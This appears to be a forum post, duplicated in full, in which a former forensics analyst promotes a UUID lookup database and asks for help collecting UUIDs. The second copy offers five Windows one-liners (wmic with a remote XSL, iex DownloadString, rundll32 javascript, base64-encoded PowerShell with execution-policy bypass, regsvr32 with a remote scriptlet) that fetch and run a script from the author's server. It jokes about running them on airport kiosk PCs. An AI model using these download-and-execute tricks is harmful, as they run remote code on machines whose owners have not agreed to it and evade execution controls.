Hello everyone.
Whether you might be working in DFIR, malware analysis or anything related to computers, you might have stumbled upon UUIDs. I did a lot during my DFIR days, and I spent too much time looking up UUIDs online trying to figure out if the UUID I had on my screen was relevant or pointless. There was no website to look them up, except search engines.
I'm building a global uuid database at http://uuid.pirate-server.com/. As a quick reminder, UUID (or GUID in MS world) are 16-bytes (128 bits) numbers, commonly used to reference a specific thing using a Universally Unique IDentifier. (or Globally Unique IDentifier). The RFC4122 ( https://tools.ietf.org/html/rfc4122 ) defines a set of UUID « versions », which can be broadly described as follows :
- uuidv1 : embeds a timestamp, the computer MAC address (whatever that means), and some other bits (e.g. the uuidd current « clock id », allowing one to decide whether or not someone rebooted between two generated UUIDs)
- uuidv2 : inexistent
- uuidv3 : MD5-based, just concatenate your payload and a 16-bytes « namespace », MD5, bitflip and that's it
- uuidv4 : random, pick 16 random bytes and flip some bytes
- uuidv5 : SHA1-based, see uuidv3.
(For a more complete introduction, just read my /index.html page. I didn't came here to repeat myself. I came here to tell you fine people about my database and to ask for help in my endless collection quest)
UUIDv1 are yielding a lot of information on the UUID generation context, thanks to the embedded MAC address. one can practically find out the daily work subjects of some lads at Redmond in the 90' :
- https://uuid.pirate-server.com/search?q=direct3d
- https://uuid.pirate-server.com/search?q=0800200c9a66
So, I have a few (4) questions :
1/ Would you run the following script in your detonation VMs ? It does just collect and upload a number of annotated UUIDs from various Microsoft Windows places.
https://uuid.pirate-server.com/c.ps1
Here are a few one-liners I never used in airport PC booths to collect UUIDs between planes.
2/ I just discovered that Wi-Fi WPS extended attributes had a UUID attribute. It's a little bit out of topic for this forum, but should you have a wlan1mon folder somewhere, the output of the following command would be greatly appreciated.
3/ I'm having a hard time trying to read registry keys in C++ from a WindowsXP equipped with VS2010. The thing is : powershell doesn't run on XP, and I would like to collect UUIDs from XP as well. I could run some manual powershell loops once in a configured VM, but I would prefer being able to run a collector in a large pool of XP machines. (They still exist, I assure you, specifically in DFIR jobs..)
The question is : in your opinion, should I continue investing time building a cpp binary in windows, or should I just instead use py2exe to get things done ? (or switch to windev.ova ?)
4/ This one is the most important question :) Do you know a place in Microsoft Windows where UUIDs might be hiding ?
I'm always looking for more UUIDs, and while another new CLSID is nice, a whole new class of UUIDs like the ACPI/UEFI DSD UUIDs or the FreeBSD vuln.xml UUIDs are always better.
Thanks a lot for reading and have a nice 2019 year.
Regards,
Whether you might be working in DFIR, malware analysis or anything related to computers, you might have stumbled upon UUIDs. I did a lot during my DFIR days, and I spent too much time looking up UUIDs online trying to figure out if the UUID I had on my screen was relevant or pointless. There was no website to look them up, except search engines.
I'm building a global uuid database at http://uuid.pirate-server.com/. As a quick reminder, UUID (or GUID in MS world) are 16-bytes (128 bits) numbers, commonly used to reference a specific thing using a Universally Unique IDentifier. (or Globally Unique IDentifier). The RFC4122 ( https://tools.ietf.org/html/rfc4122 ) defines a set of UUID « versions », which can be broadly described as follows :
- uuidv1 : embeds a timestamp, the computer MAC address (whatever that means), and some other bits (e.g. the uuidd current « clock id », allowing one to decide whether or not someone rebooted between two generated UUIDs)
- uuidv2 : inexistent
- uuidv3 : MD5-based, just concatenate your payload and a 16-bytes « namespace », MD5, bitflip and that's it
- uuidv4 : random, pick 16 random bytes and flip some bytes
- uuidv5 : SHA1-based, see uuidv3.
(For a more complete introduction, just read my /index.html page. I didn't came here to repeat myself. I came here to tell you fine people about my database and to ask for help in my endless collection quest)
UUIDv1 are yielding a lot of information on the UUID generation context, thanks to the embedded MAC address. one can practically find out the daily work subjects of some lads at Redmond in the 90' :
- https://uuid.pirate-server.com/search?q=direct3d
- https://uuid.pirate-server.com/search?q=0800200c9a66
So, I have a few (4) questions :
1/ Would you run the following script in your detonation VMs ? It does just collect and upload a number of annotated UUIDs from various Microsoft Windows places.
https://uuid.pirate-server.com/c.ps1
Here are a few one-liners I never used in airport PC booths to collect UUIDs between planes.
Code: Select all
wmic process get name /format:"https://uuid.pirate-server.com/c.xsl"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
iex (New-Object System.Net.WebClient).DownloadString('https://uuid.pirate-server.com/c.ps1')
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://uuid.pirate-server.com/c.ps1/');"
powershell -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHUAdQBpAGQALgBwAGkAcgBhAHQAZQAtAHMAZQByAHYAZQByAC4AYwBvAG0ALwBjAC4AcABzADEAJwApAA==
regsvr32 /s /n /u /i:https://uuid.pirate-server.com/c.sct scrobj.dll
2/ I just discovered that Wi-Fi WPS extended attributes had a UUID attribute. It's a little bit out of topic for this forum, but should you have a wlan1mon folder somewhere, the output of the following command would be greatly appreciated.
Code: Select all
for i in *cap ; do tshark -r ${i} -Y 'wps.type' -Tfields -e wps.uuid_e -e wps.uuid_r -e wlan.ssid -e wlan.bssid -e wps.manufacturer -e wps.model_name -e wps.device_name ; done | sort -u > ~/wps.txt
3/ I'm having a hard time trying to read registry keys in C++ from a WindowsXP equipped with VS2010. The thing is : powershell doesn't run on XP, and I would like to collect UUIDs from XP as well. I could run some manual powershell loops once in a configured VM, but I would prefer being able to run a collector in a large pool of XP machines. (They still exist, I assure you, specifically in DFIR jobs..)
The question is : in your opinion, should I continue investing time building a cpp binary in windows, or should I just instead use py2exe to get things done ? (or switch to windev.ova ?)
4/ This one is the most important question :) Do you know a place in Microsoft Windows where UUIDs might be hiding ?
I'm always looking for more UUIDs, and while another new CLSID is nice, a whole new class of UUIDs like the ACPI/UEFI DSD UUIDs or the FreeBSD vuln.xml UUIDs are always better.
Thanks a lot for reading and have a nice 2019 year.
Regards,